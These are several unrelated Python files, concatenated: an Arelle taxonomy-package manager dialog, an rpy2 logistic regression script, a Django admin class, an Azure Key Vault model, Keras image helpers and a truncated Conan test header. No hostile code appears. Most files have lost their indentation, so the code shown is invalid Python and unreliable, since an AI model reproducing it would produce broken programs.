except ImportError:
import re
def dialogPackageManager(mainWin):
# check for updates in background
import threading
thread = threading.Thread(target=lambda cntlr=mainWin: backgroundCheckForUpdates(cntlr))
thread.daemon = True
thread.start()
def backgroundCheckForUpdates(cntlr):
cntlr.showStatus(_("Checking for updates to packages")) # clear web loading status
packageNamesWithNewerFileDates = PackageManager.packageNamesWithNewerFileDates()
if packageNamesWithNewerFileDates:
cntlr.showStatus(_("Updates are available for these packages: {0}")
.format(', '.join(packageNamesWithNewerFileDates)), clearAfter=5000)
else:
cntlr.showStatus(_("No updates found for packages."), clearAfter=5000)
time.sleep(0.1) # Mac locks up without this, may be needed for empty ui queue?
cntlr.uiThreadQueue.put((DialogPackageManager, [cntlr, packageNamesWithNewerFileDates]))
class DialogPackageManager(Toplevel):
def __init__(self, mainWin, packageNamesWithNewerFileDates):
super(DialogPackageManager, self).__init__(mainWin.parent)
self.ENABLE = _("Enable")
self.DISABLE = _("Disable")
self.parent = mainWin.parent
self.cntlr = mainWin
# copy plugins for temporary display
self.packagesConfig = PackageManager.packagesConfig
self.packagesConfigChanged = False
self.packageNamesWithNewerFileDates = packageNamesWithNewerFileDates
        parentGeometry = re.match(r"(\d+)x(\d+)[+]?([-]?\d+)[+]?([-]?\d+)", self.parent.geometry())
dialogX = int(parentGeometry.group(3))
dialogY = int(parentGeometry.group(4))
self.title(_("Taxonomy Packages Manager"))
frame = Frame(self)
# left button frame
buttonFrame = Frame(frame, width=40)
buttonFrame.columnconfigure(0, weight=1)
addLabel = Label(buttonFrame, text=_("Find taxonomy packages:"), wraplength=64, justify="center")
addLocalButton = Button(buttonFrame, text=_("Locally"), command=self.findLocally)
ToolTip(addLocalButton, text=_("File chooser allows selecting taxonomy packages to add (or reload), from the local file system. "
"Select either a PWD or prior taxonomy package zip file, or a taxonomy manifest (.taxonomyPackage.xml) within an unzipped taxonomy package. "), wraplength=360)
addWebButton = Button(buttonFrame, text=_("On Web"), command=self.findOnWeb)
ToolTip(addWebButton, text=_("Dialog to enter URL full path to load (or reload) package, from the web or local file system. "
"URL may be either a PWD or prior taxonomy package zip file, or a taxonomy manifest (.taxonomyPackage.xml) within an unzipped taxonomy package. "), wraplength=360)
manifestNameButton = Button(buttonFrame, text=_("Manifest"), command=self.manifestName)
ToolTip(manifestNameButton, text=_("Provide pre-PWD non-standard archive manifest file name pattern (e.g., *taxonomyPackage.xml). "
"Uses unix file name pattern matching. "
"Multiple manifest files are supported in pre-PWD archives (such as oasis catalogs). "
"(Replaces pre-PWD search for either .taxonomyPackage.xml or catalog.xml). "), wraplength=480)
self.manifestNamePattern = ""
addLabel.grid(row=0, column=0, pady=4)
addLocalButton.grid(row=1, column=0, pady=4)
addWebButton.grid(row=2, column=0, pady=4)
manifestNameButton.grid(row=3, column=0, pady=4)
buttonFrame.grid(row=0, column=0, rowspan=3, sticky=(N, S, W), padx=3, pady=3)
# right tree frame (packages already known to arelle)
packagesFrame = Frame(frame, width=700)
vScrollbar = Scrollbar(packagesFrame, orient=VERTICAL)
hScrollbar = Scrollbar(packagesFrame, orient=HORIZONTAL)
self.packagesView = Treeview(packagesFrame, xscrollcommand=hScrollbar.set, yscrollcommand=vScrollbar.set, height=7)
self.packagesView.grid(row=0, column=0, sticky=(N, S, E, W))
self.packagesView.bind('<<TreeviewSelect>>', self.packageSelect)
hScrollbar["command"] = self.packagesView.xview
hScrollbar.grid(row=1, column=0, sticky=(E,W))
vScrollbar["command"] = self.packagesView.yview
vScrollbar.grid(row=0, column=1, sticky=(N,S))
packagesFrame.columnconfigure(0, weight=1)
packagesFrame.rowconfigure(0, weight=1)
packagesFrame.grid(row=0, column=1, columnspan=4, sticky=(N, S, E, W), padx=3, pady=3)
self.packagesView.focus_set()
self.packagesView.column("#0", width=120, anchor="w")
self.packagesView.heading("#0", text=_("Name"))
self.packagesView["columns"] = ("ver", "status", "date", "update", "descr")
self.packagesView.column("ver", width=150, anchor="w", stretch=False)
self.packagesView.heading("ver", text=_("Version"))
self.packagesView.column("status", width=50, anchor="w", stretch=False)
self.packagesView.heading("status", text=_("Status"))
self.packagesView.column("date", width=170, anchor="w", stretch=False)
self.packagesView.heading("date", text=_("File Date"))
self.packagesView.column("update", width=50, anchor="w", stretch=False)
self.packagesView.heading("update", text=_("Update"))
self.packagesView.column("descr", width=200, anchor="w", stretch=False)
self.packagesView.heading("descr", text=_("Description"))
remappingsFrame = Frame(frame)
vScrollbar = Scrollbar(remappingsFrame, orient=VERTICAL)
hScrollbar = Scrollbar(remappingsFrame, orient=HORIZONTAL)
self.remappingsView = Treeview(remappingsFrame, xscrollcommand=hScrollbar.set, yscrollcommand=vScrollbar.set, height=5)
self.remappingsView.grid(row=0, column=0, sticky=(N, S, E, W))
hScrollbar["command"] = self.remappingsView.xview
hScrollbar.grid(row=1, column=0, sticky=(E,W))
vScrollbar["command"] = self.remappingsView.yview
vScrollbar.grid(row=0, column=1, sticky=(N,S))
remappingsFrame.columnconfigure(0, weight=1)
remappingsFrame.rowconfigure(0, weight=1)
remappingsFrame.grid(row=1, column=1, columnspan=4, sticky=(N, S, E, W), padx=3, pady=3)
self.remappingsView.focus_set()
self.remappingsView.column("#0", width=200, anchor="w")
self.remappingsView.heading("#0", text=_("Prefix"))
self.remappingsView["columns"] = ("remapping")
self.remappingsView.column("remapping", width=500, anchor="w", stretch=False)
self.remappingsView.heading("remapping", text=_("Remapping"))
# bottom frame package info details
packageInfoFrame = Frame(frame, width=700)
packageInfoFrame.columnconfigure(1, weight=1)
self.packageNameLabel = Label(packageInfoFrame, wraplength=600, justify="left",
font=font.Font(family='Helvetica', size=12, weight='bold'))
self.packageNameLabel.grid(row=0, column=0, columnspan=6, sticky=W)
self.packageVersionHdr = Label(packageInfoFrame, text=_("version:"), state=DISABLED)
self.packageVersionHdr.grid(row=1, column=0, sticky=W)
self.packageVersionLabel = Label(packageInfoFrame, wraplength=600, justify="left")
self.packageVersionLabel.grid(row=1, column=1, columnspan=5, sticky=W)
self.packageDescrHdr = Label(packageInfoFrame, text=_("description:"), state=DISABLED)
self.packageDescrHdr.grid(row=2, column=0, sticky=W)
self.packageDescrLabel = Label(packageInfoFrame, wraplength=600, justify="left")
self.packageDescrLabel.grid(row=2, column=1, columnspan=5, sticky=W)
self.packagePrefixesHdr = Label(packageInfoFrame, text=_("prefixes:"), state=DISABLED)
self.packagePrefixesHdr.grid(row=3, column=0, sticky=W)
self.packagePrefixesLabel = Label(packageInfoFrame, wraplength=600, justify="left")
self.packagePrefixesLabel.grid(row=3, column=1, columnspan=5, sticky=W)
ToolTip(self.packagePrefixesLabel, text=_("List of prefixes that this package remaps."), wraplength=240)
self.packageUrlHdr = Label(packageInfoFrame, text=_("URL:"), state=DISABLED)
self.packageUrlHdr.grid(row=4, column=0, sticky=W)
self.packageUrlLabel = Label(packageInfoFrame, wraplength=600, justify="left")
self.packageUrlLabel.grid(row=4, column=1, columnspan=5, sticky=W)
ToolTip(self.packageUrlLabel, text=_("URL of taxonomy package (local file path or web loaded file)."), wraplength=240)
self.packageDateHdr = Label(packageInfoFrame, text=_("date:"), state=DISABLED)
self.packageDateHdr.grid(row=5, column=0, sticky=W)
self.packageDateLabel = Label(packageInfoFrame, wraplength=600, justify="left")
self.packageDateLabel.grid(row=5, column=1, columnspan=5, sticky=W)
        ToolTip(self.packageDateLabel, text=_("Date of currently loaded package file (with parenthetical note when an update is available)."), wraplength=240)
self.packageEnableButton = Button(packageInfoFrame, text=self.ENABLE, state=DISABLED, command=self.packageEnable)
ToolTip(self.packageEnableButton, text=_("Enable/disable package."), wraplength=240)
self.packageEnableButton.grid(row=6, column=1, sticky=E)
self.packageMoveUpButton = Button(packageInfoFrame, text=_("Move Up"), state=DISABLED, command=self.packageMoveUp)
ToolTip(self.packageMoveUpButton, text=_("Move package up (above other remappings)."), wraplength=240)
self.packageMoveUpButton.grid(row=6, column=2, sticky=E)
self.packageMoveDownButton = Button(packageInfoFrame, text=_("Move Down"), state=DISABLED, command=self.packageMoveDown)
ToolTip(self.packageMoveDownButton, text=_("Move package down (below other remappings)."), wraplength=240)
self.packageMoveDownButton.grid(row=6, column=3, sticky=E)
self.packageReloadButton = Button(packageInfoFrame, text=_("Reload"), state=DISABLED, command=self.packageReload)
ToolTip(self.packageReloadButton, text=_("Reload/update package."), wraplength=240)
self.packageReloadButton.grid(row=6, column=4, sticky=E)
self.packageRemoveButton = Button(packageInfoFrame, text=_("Remove"), state=DISABLED, command=self.packageRemove)
ToolTip(self.packageRemoveButton, text=_("Remove package from packages table (does not erase the package file)."), wraplength=240)
self.packageRemoveButton.grid(row=6, column=5, sticky=E)
packageInfoFrame.grid(row=2, column=0, columnspan=5, sticky=(N, S, E, W), padx=3, pady=3)
packageInfoFrame.config(borderwidth=4, relief="groove")
okButton = Button(frame, text=_("Close"), command=self.ok)
ToolTip(okButton, text=_("Accept and changes (if any) and close dialog."), wraplength=240)
cancelButton = Button(frame, text=_("Cancel"), command=self.close)
ToolTip(cancelButton, text=_("Cancel changes (if any) and close dialog."), wraplength=240)
okButton.grid(row=3, column=3, sticky=(S,E), pady=3)
cancelButton.grid(row=3, column=4, sticky=(S,E), pady=3, padx=3)
enableDisableFrame = Frame(frame)
enableDisableFrame.grid(row=3, column=1, sticky=(S,W), pady=3)
enableAllButton = Button(enableDisableFrame, text=_("Enable All"), command=self.enableAll)
ToolTip(enableAllButton, text=_("Enable all packages."), wraplength=240)
disableAllButton = Button(enableDisableFrame, text=_("Disable All"), command=self.disableAll)
ToolTip(disableAllButton, text=_("Disable all packages."), wraplength=240)
enableAllButton.grid(row=1, column=1)
disableAllButton.grid(row=1, column=2)
self.loadTreeViews()
self.geometry("+{0}+{1}".format(dialogX+50,dialogY+100))
frame.grid(row=0, column=0, sticky=(N,S,E,W))
frame.columnconfigure(0, weight=0)
frame.columnconfigure(1, weight=1)
frame.rowconfigure(0, weight=1)
window = self.winfo_toplevel()
window.columnconfigure(0, weight=1)
window.rowconfigure(0, weight=1)
self.bind("<Return>", self.ok)
self.bind("<Escape>", self.close)
self.protocol("WM_DELETE_WINDOW", self.close)
self.grab_set()
self.wait_window(self)
def loadTreeViews(self):
self.selectedModule = None
# clear previous treeview entries
for previousNode in self.packagesView.get_children(""):
self.packagesView.delete(previousNode)
for i, packageInfo in enumerate(self.packagesConfig.get("packages", [])):
name = packageInfo.get("name", "package{}".format(i))
node = self.packagesView.insert("", "end", "_{}".format(i), text=name)
self.packagesView.set(node, "ver", packageInfo.get("version"))
self.packagesView.set(node, "status", packageInfo.get("status"))
self.packagesView.set(node, "date", packageInfo.get("fileDate"))
if name in self.packageNamesWithNewerFileDates:
self.packagesView.set(node, "update", _("available"))
self.packagesView.set(node, "descr", packageInfo.get("description"))
# clear previous treeview entries
for previousNode in self.remappingsView.get_children(""):
self.remappingsView.delete(previousNode)
for i, remappingItem in enumerate(sorted(self.packagesConfig.get("remappings", {}).items())):
prefix, remapping = remappingItem
node = self.remappingsView.insert("", "end", prefix, text=prefix)
self.remappingsView.set(node, "remapping", remapping)
self.packageSelect() # clear out prior selection
def ok(self, event=None):
if self.packagesConfigChanged:
PackageManager.packagesConfig = self.packagesConfig
PackageManager.packagesConfigChanged = True
self.cntlr.onPackageEnablementChanged()
self.close()
def close(self, event=None):
self.parent.focus_set()
self.destroy()
def packageSelect(self, *args):
node = (self.packagesView.selection() or (None,))[0]
try:
nodeIndex = int(node[1:])
except (ValueError, TypeError):
nodeIndex = -1
if 0 <= nodeIndex < len(self.packagesConfig["packages"]):
packageInfo = self.packagesConfig["packages"][nodeIndex]
self.selectedPackageIndex = nodeIndex
name = packageInfo["name"]
self.packageNameLabel.config(text=name)
self.packageVersionHdr.config(state=ACTIVE)
self.packageVersionLabel.config(text=packageInfo["version"])
self.packageDescrHdr.config(state=ACTIVE)
self.packageDescrLabel.config(text=packageInfo["description"])
self.packagePrefixesHdr.config(state=ACTIVE)
self.packagePrefixesLabel.config(text=', '.join(packageInfo["remappings"].keys()))
self.packageUrlHdr.config(state=ACTIVE)
self.packageUrlLabel.config(text=packageInfo["URL"])
self.packageDateHdr.config(state=ACTIVE)
self.packageDateLabel.config(text=packageInfo["fileDate"] + " " +
(_("(an update is available)") if name in self.packageNamesWithNewerFileDates else ""))
self.packageEnableButton.config(state=ACTIVE,
text={"enabled":self.DISABLE,
"disabled":self.ENABLE}[packageInfo["status"]])
self.packageMoveUpButton.config(state=ACTIVE if 0 < nodeIndex else DISABLED)
self.packageMoveDownButton.config(state=ACTIVE if nodeIndex < (len(self.packagesConfig["packages"]) - 1) else DISABLED)
self.packageReloadButton.config(state=ACTIVE)
self.packageRemoveButton.config(state=ACTIVE)
else:
self.selectedPackageIndex = -1
self.packageNameLabel.config(text="")
self.packageVersionHdr.config(state=DISABLED)
self.packageVersionLabel.config(text="")
self.packageDescrHdr.config(state=DISABLED)
self.packageDescrLabel.config(text="")
self.packagePrefixesHdr.config(state=DISABLED)
self.packagePrefixesLabel.config(text="")
self.packageUrlHdr.config(state=DISABLED)
self.packageUrlLabel.config(text="")
self.packageDateHdr.config(state=DISABLED)
self.packageDateLabel.config(text="")
self.packageEnableButton.config(state=DISABLED, text=self.ENABLE)
self.packageMoveUpButton.config(state=DISABLED)
self.packageMoveDownButton.config(state=DISABLED)
self.packageReloadButton.config(state=DISABLED)
self.packageRemoveButton.config(state=DISABLED)
def findLocally(self):
initialdir = self.cntlr.pluginDir # default plugin directory
if not self.cntlr.isMac: # can't navigate within app easily, always start in default directory
initialdir = self.cntlr.config.setdefault("packageOpenDir", initialdir)
filename = self.cntlr.uiFileDialog("open",
parent=self,
title=_("Choose taxonomy package file"),
initialdir=initialdir,
filetypes=[(_("Taxonomy package files (*.zip)"), "*.zip"),
(_("PWD Manifest (taxonomyPackage.xml)"), "taxonomyPackage.xml"),
(_("pre-PWD Manifest (*.taxonomyPackage.xml)"), "*.taxonomyPackage.xml"),
(_("pre-PWD Oasis Catalog (*catalog.xml)"), "*catalog.xml")],
defaultextension=".zip")
if filename:
            # check if a package is selected (any file in a directory containing an __init__.py)
self.cntlr.config["packageOpenDir"] = os.path.dirname(filename)
packageInfo = PackageManager.packageInfo(self.cntlr, filename, packageManifestName=self.manifestNamePattern)
self.loadFoundPackageInfo(packageInfo, filename)
def findOnWeb(self):
url = DialogURL.askURL(self)
if url: # url is the in-cache or local file
packageInfo = PackageManager.packageInfo(self.cntlr, url, packageManifestName=self.manifestNamePattern)
self.cntlr.showStatus("") # clear web loading status
self.loadFoundPackageInfo(packageInfo, url)
def manifestName(self):
self.manifestNamePattern = simpledialog.askstring(_("Archive manifest file name pattern"),
_("Provide non-standard archive manifest file name pattern (e.g., *taxonomyPackage.xml). \n"
"Uses unix file name pattern matching. \n"
"Multiple manifest files are supported in archive (such as oasis catalogs). \n"
"(If blank, search for either .taxonomyPackage.xml or catalog.xml). "),
initialvalue=self.manifestNamePattern,
parent=self)
def loadFoundPackageInfo(self, packageInfo, url):
if packageInfo and packageInfo.get("name"):
self.addPackageInfo(packageInfo)
self.loadTreeViews()
else:
messagebox.showwarning(_("Package is not itself a taxonomy package. "),
_("File does not itself contain a manifest file: \n\n{0}\n\n "
"If opening an archive file, the manifest file search pattern currently is \"\", please press \"Manifest\" to change manifest file name pattern, e.g.,, \"*.taxonomyPackage.xml\", if needed. ")
.format(url),
parent=self)
def removePackageInfo(self, name, version):
# find package entry
packagesList = self.packagesConfig["packages"]
j = -1
for i, packageInfo in enumerate(packagesList):
if packageInfo['name'] == name and packageInfo['version'] == version:
j = i
break
if 0 <= j < len(packagesList):
            del self.packagesConfig["packages"][j]
self.packagesConfigChanged = True
def addPackageInfo(self, packageInfo):
name = packageInfo["name"]
version = packageInfo["version"]
self.removePackageInfo(name, version) # remove any prior entry for this package
self.packageNamesWithNewerFileDates.discard(name) # no longer has an update available
self.packagesConfig["packages"].append(packageInfo)
PackageManager.rebuildRemappings(self.cntlr)
self.packagesConfigChanged = True
def packageEnable(self):
if 0 <= self.selectedPackageIndex < len(self.packagesConfig["packages"]):
packageInfo = self.packagesConfig["packages"][self.selectedPackageIndex]
if self.packageEnableButton['text'] == self.ENABLE:
packageInfo["status"] = "enabled"
self.packageEnableButton['text'] = self.DISABLE
elif self.packageEnableButton['text'] == self.DISABLE:
packageInfo["status"] = "disabled"
self.packageEnableButton['text'] = self.ENABLE
self.packagesConfigChanged = True
PackageManager.rebuildRemappings(self.cntlr)
self.loadTreeViews()
def packageMoveUp(self):
if 1 <= self.selectedPackageIndex < len(self.packagesConfig["packages"]):
packages = self.packagesConfig["packages"]
packageInfo = packages[self.selectedPackageIndex]
del packages[self.selectedPackageIndex]
packages.insert(self.selectedPackageIndex -1, packageInfo)
self.packagesConfigChanged = True
PackageManager.rebuildRemappings(self.cntlr)
self.loadTreeViews()
def packageMoveDown(self):
if 0 <= self.selectedPackageIndex < len(self.packagesConfig["packages"]) - 1:
packages = self.packagesConfig["packages"]
packageInfo = packages[self.selectedPackageIndex]
del packages[self.selectedPackageIndex]
packages.insert(self.selectedPackageIndex + 1, packageInfo)
self.packagesConfigChanged = True
PackageManager.rebuildRemappings(self.cntlr)
self.loadTreeViews()
def packageReload(self):
if 0 <= self.selectedPackageIndex < len(self.packagesConfig["packages"]):
packageInfo = self.packagesConfig["packages"][self.selectedPackageIndex]
url = packageInfo.get("URL")
if url:
packageInfo = PackageManager.packageInfo(self.cntlr, url, reload=True, packageManifestName=packageInfo.get("manifestName"))
if packageInfo:
self.addPackageInfo(packageInfo)
PackageManager.rebuildRemappings(self.cntlr)
self.loadTreeViews()
self.cntlr.showStatus(_("{0} reloaded").format(packageInfo.get("name")), clearAfter=5000)
else:
messagebox.showwarning(_("Package error"),
_("File or package cannot be reloaded: \n\n{0}")
.format(url),
parent=self)
def packageRemove(self):
if 0 <= self.selectedPackageIndex < len(self.packagesConfig["packages"]):
packageInfo = self.packagesConfig["packages"][self.selectedPackageIndex]
self.removePackageInfo(packageInfo["name"], packageInfo["version"])
self.packagesConfigChanged = True
PackageManager.rebuildRemappings(self.cntlr)
self.loadTreeViews()
def enableAll(self):
self.enableDisableAll(True)
def disableAll(self):
self.enableDisableAll(False)
def enableDisableAll(self, doEnable):
for iPkg in range(len(self.packagesConfig["packages"])):
packageInfo = self.packagesConfig["packages"][iPkg]
if doEnable:
packageInfo["status"] = "enabled"
self.packageEnableButton['text'] = self.DISABLE
else:
packageInfo["status"] = "disabled"
self.packageEnableButton['text'] = self.ENABLE
self.packagesConfigChanged = True
PackageManager.rebuildRemappings(self.cntlr)
self.loadTreeViews()
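# ---------------------------------------------------------------------------
# Hypothetical invocation sketch (not part of the original module). The dialog
# is normally opened from the Arelle GUI: dialogPackageManager() runs the
# update check on a background thread and then queues DialogPackageManager on
# the controller's uiThreadQueue.
#
#     # from a GUI menu handler, where `mainWin` is the main window controller:
#     # dialogPackageManager(mainWin)
# ---------------------------------------------------------------------------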
|
py | 1a30569524fe48b7b19699ba32d0e32ab5a2a404 | #!/usr/bin/env python
# from galaxy import eggs
import sys
import rpy2.rinterface as ri
import rpy2.rlike.container as rlc
# from rpy import *
import rpy2.robjects as robjects
r = robjects.r
def stop_err(msg):
sys.stderr.write(msg)
sys.exit()
infile = sys.argv[1]
y_col = int(sys.argv[2]) - 1
x_cols = sys.argv[3].split(",")
outfile = sys.argv[4]
print("Predictor columns: %s; Response column: %d" % (x_cols, y_col + 1))
fout = open(outfile, "w")
elems = []
for i, line in enumerate(open(infile)):
line = line.rstrip("\r\n")
if len(line) > 0 and not line.startswith("#"):
elems = line.split("\t")
break
if i == 30:
break # Hopefully we'll never get here...
if len(elems) < 1:
stop_err(
"The data in your input dataset is either missing or not formatted properly."
)
y_vals = []
x_vals = []
x_vector = []
for k, col in enumerate(x_cols):
x_cols[k] = int(col) - 1
x_vals.append([])
NA = "NA"
for ind, line in enumerate(open(infile)):
if line and not line.startswith("#"):
try:
fields = line.split("\t")
try:
yval = float(fields[y_col])
except Exception:
yval = r("NA")
y_vals.append(yval)
for k, col in enumerate(x_cols):
try:
xval = float(fields[col])
except Exception:
xval = r("NA")
x_vals[k].append(xval)
x_vector.append(xval)
except Exception as e:
print(e)
# x_vals1 = numpy.asarray(x_vals).transpose()
check1 = 0
check0 = 0
for i in y_vals:
if i == 1:
check1 = 1
if i == 0:
check0 = 1
if check1 == 0 or check0 == 0:
sys.exit("Warning: logistic regression must have at least two classes")
for i in y_vals:
if i not in [1, 0, r("NA")]:
print(str(i), file=fout)
sys.exit(
"Warning: the current version of this tool can run only with two classes and need to be labeled as 0 and 1."
)
# dat= r.list(x=array(x_vals1), y=y_vals)
novif = 0
# set_default_mode(NO_CONVERSION)
# try:
# linear_model = r.glm(r("y ~ x"), data = r.na_exclude(dat),family="binomial")
# #r('library(car)')
# #r.assign('dat',dat)
# #r.assign('ncols',len(x_cols))
# #r.vif(r('glm(dat$y ~ ., data = na.exclude(data.frame(as.matrix(dat$x,ncol=ncols))->datx),family="binomial")')).as_py()
#
# except Exception as rex:
# stop_err("Error performing logistic regression on the input data.\nEither the response column or one of the predictor columns contain only non-numeric or invalid values.")
fv = robjects.FloatVector(x_vector)
m = r["matrix"](fv, ncol=len(x_cols), byrow=True)
# ensure order for generating formula
od = rlc.OrdDict([("y", robjects.FloatVector(y_vals)), ("x", m)])
dat = robjects.DataFrame(od)
# convert dat.names: ["y","x.1","x.2"] to formula string: 'y ~ x.1 + x.2'
formula = " + ".join(dat.names).replace("+", "~", 1)
print(formula)
try:
linear_model = r.glm(formula, data=r["na.exclude"](dat), family="binomial")
except Exception:
stop_err(
"Error performing linear regression on the input data.\nEither the response column or one of the predictor columns contain only non-numeric or invalid values."
)
if len(x_cols) > 1:
try:
r("library(car)")
r.assign("dat", dat)
r.assign("ncols", len(x_cols))
# vif=r.vif(r('glm(dat$y ~ ., data = na.exclude(data.frame(as.matrix(dat$x,ncol=ncols))->datx),family="binomial")'))
od2 = rlc.OrdDict([("datx", m)])
glm_data_frame = robjects.DataFrame(od2)
glm_result = r.glm(
"dat$y ~ .", data=r["na.exclude"](glm_data_frame), family="binomial"
)
print("Have glm")
vif = r.vif(glm_result)
except Exception as rex:
print(rex)
else:
novif = 1
# set_default_mode(BASIC_CONVERSION)
# coeffs=linear_model.as_py()['coefficients']
coeffs = linear_model.rx2("coefficients")
# null_deviance=linear_model.as_py()['null.deviance']
null_deviance = linear_model.rx2("null.deviance")[0]
# residual_deviance=linear_model.as_py()['deviance']
residual_deviance = linear_model.rx2("deviance")[0]
# yintercept= coeffs['(Intercept)']
yintercept = coeffs.rx2("(Intercept)")[0]
summary = r.summary(linear_model)
# co = summary.get('coefficients', 'NA')
co = summary.rx2("coefficients")
print(co)
"""
if len(co) != len(x_vals)+1:
stop_err("Stopped performing logistic regression on the input data, since one of the predictor columns contains only non-numeric or invalid values.")
"""
try:
yintercept = r.round(float(yintercept), digits=10)[0]
# pvaly = r.round(float(co[0][3]), digits=10)
pvaly = r.round(float(co.rx(1, 4)[0]), digits=10)[0]
except Exception as e:
print(str(e))
print("response column\tc%d" % (y_col + 1), file=fout)
tempP = []
for i in x_cols:
tempP.append("c" + str(i + 1))
tempP = ",".join(tempP)
print("predictor column(s)\t%s" % (tempP), file=fout)
print("Y-intercept\t%s" % (yintercept), file=fout)
print("p-value (Y-intercept)\t%s" % (pvaly), file=fout)
print(coeffs)
if len(x_vals) == 1: # Simple linear regression case with 1 predictor variable
try:
# slope = r.round(float(coeffs['x']), digits=10)
raw_slope = coeffs.rx2("x")[0]
slope = r.round(float(raw_slope), digits=10)[0]
except Exception:
slope = "NA"
try:
# pval = r.round(float(co[1][3]), digits=10)
pval = r.round(float(co.rx2(2, 4)[0]), digits=10)[0]
except Exception:
pval = "NA"
print("Slope (c%d)\t%s" % (x_cols[0] + 1, slope), file=fout)
print("p-value (c%d)\t%s" % (x_cols[0] + 1, pval), file=fout)
else: # Multiple regression case with >1 predictors
ind = 1
# while ind < len(coeffs.keys()):
print(len(coeffs.names))
while ind < len(coeffs.names):
try:
# slope = r.round(float(coeffs['x'+str(ind)]), digits=10)
raw_slope = coeffs.rx2("x." + str(ind))[0]
slope = r.round(float(raw_slope), digits=10)[0]
except Exception:
slope = "NA"
print("Slope (c%d)\t%s" % (x_cols[ind - 1] + 1, slope), file=fout)
try:
# pval = r.round(float(co[ind][3]), digits=10)
pval = r.round(float(co.rx2(ind + 1, 4)[0]), digits=10)[0]
except Exception:
pval = "NA"
print("p-value (c%d)\t%s" % (x_cols[ind - 1] + 1, pval), file=fout)
ind += 1
# rsq = summary.get('r.squared','NA')
rsq = summary.rx2("r.squared")
if rsq == ri.RNULLType():
rsq = "NA"
else:
rsq = rsq[0]
try:
# rsq= r.round(float((null_deviance-residual_deviance)/null_deviance), digits=5)
rsq = r.round(float((null_deviance - residual_deviance) / null_deviance), digits=5)[
0
]
# null_deviance= r.round(float(null_deviance), digits=5)
null_deviance = r.round(float(null_deviance), digits=5)[0]
# residual_deviance= r.round(float(residual_deviance), digits=5)
residual_deviance = r.round(float(residual_deviance), digits=5)[0]
except Exception:
pass
print("Null deviance\t%s" % (null_deviance), file=fout)
print("Residual deviance\t%s" % (residual_deviance), file=fout)
print("pseudo R-squared\t%s" % (rsq), file=fout)
print("\n", file=fout)
print("vif", file=fout)
if novif == 0:
# py_vif=vif.as_py()
count = 0
for i in sorted(vif.names):
print("c" + str(x_cols[count] + 1), str(vif.rx2(i)[0]), file=fout)
count += 1
elif novif == 1:
print("vif can calculate only when model have more than 1 predictor", file=fout)
|
py | 1a3057b5508f146d4372d9bbb5ae1f72c305925b | from django.contrib import admin
from .models import Listing
class ListingAdmin(admin.ModelAdmin):
list_display = ('id', 'title', 'is_published', 'price', 'list_date', 'realtor')
list_display_links = ('id', 'title')
list_filter = ('realtor',)
list_editable = ('is_published',)
search_fields = ('title', 'description', 'address', 'city', 'zipcode', 'price')
list_per_page = 25
admin.site.register(Listing, ListingAdmin) |
py | 1a3057e7bf1790f7a33ff516356a2149953eee24 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class StorageAccountItem(Model):
"""The storage account item containing storage account metadata.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar id: Storage identifier.
:vartype id: str
:ivar resource_id: Storage account resource Id.
:vartype resource_id: str
:ivar attributes: The storage account management attributes.
:vartype attributes: ~azure.keyvault.models.StorageAccountAttributes
:ivar tags: Application specific metadata in the form of key-value pairs.
:vartype tags: dict[str, str]
"""
_validation = {
'id': {'readonly': True},
'resource_id': {'readonly': True},
'attributes': {'readonly': True},
'tags': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'attributes': {'key': 'attributes', 'type': 'StorageAccountAttributes'},
'tags': {'key': 'tags', 'type': '{str}'},
}
def __init__(self, **kwargs):
super(StorageAccountItem, self).__init__(**kwargs)
self.id = None
self.resource_id = None
self.attributes = None
self.tags = None
|
py | 1a30587df351cc55b048aef37b79c75f822eba8a | #!/usr/bin/python3
"""
Copyright 2018-2019 Firmin.Sun ([email protected])
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# -----------------------------------------------------
# @Time : 11/8/2018 4:54 PM
# @Author : Firmin.Sun ([email protected])
# @Software: ZJ_AI
# -----------------------------------------------------
# -*- coding: utf-8 -*-
import keras
import numpy as np
import cv2
from PIL import Image
def read_image_bgr(path):
'''
:param path:
:return: (h, w, 3)
'''
try:
image = np.asarray(Image.open(path).convert('RGB'))
except Exception as ex:
print(path)
return image[:, :, ::-1].copy()
def preprocess_image(x):
# mostly identical to "https://github.com/fchollet/keras/blob/master/keras/applications/imagenet_utils.py"
# except for converting RGB -> BGR since we assume BGR already
x = x.astype(keras.backend.floatx())
if keras.backend.image_data_format() == 'channels_first':
if x.ndim == 3:
x[0, :, :] -= 103.939
x[1, :, :] -= 116.779
x[2, :, :] -= 123.68
else:
x[:, 0, :, :] -= 103.939
x[:, 1, :, :] -= 116.779
x[:, 2, :, :] -= 123.68
else:
x[..., 0] -= 103.939
x[..., 1] -= 116.779
x[..., 2] -= 123.68
return x
def resize_image(image, min_side=448, max_side=448):
'''
    resize image to a fixed target size
    :param image: input (h, w, 3) = (rows, cols, 3)
    :param min_side: target output size (default 448)
    :param max_side: target output size (default 448)
    :return: resized image and the scale factors relative to the input (h, w)
'''
(h, w, _) = image.shape
scale = np.asarray((min_side, max_side),dtype=float) / np.asarray((h, w),dtype=float)
# resize the image with the computed scale
# cv2.resize(image, (w, h))
img = cv2.resize(image, (min_side, max_side))
return img, scale
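# ---------------------------------------------------------------------------
# Hypothetical usage sketch (not part of the original module); the file path
# is a placeholder.
#
#     img = read_image_bgr('example.jpg')        # (h, w, 3), BGR order
#     img, scale = resize_image(img, 448, 448)   # scale relative to (h, w)
#     img = preprocess_image(img)                # subtract per-channel means
# ---------------------------------------------------------------------------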
|
py | 1a3058ecaea4ad3eec37bbe8cab4192826efd69a | import os
import unittest
import pytest
from nose.plugins.attrib import attr
from conans.test.assets.multi_config import multi_config_files
from conans.test.utils.tools import TestClient
@attr("slow")
@pytest.mark.slow
@pytest.mark.tool_cmake
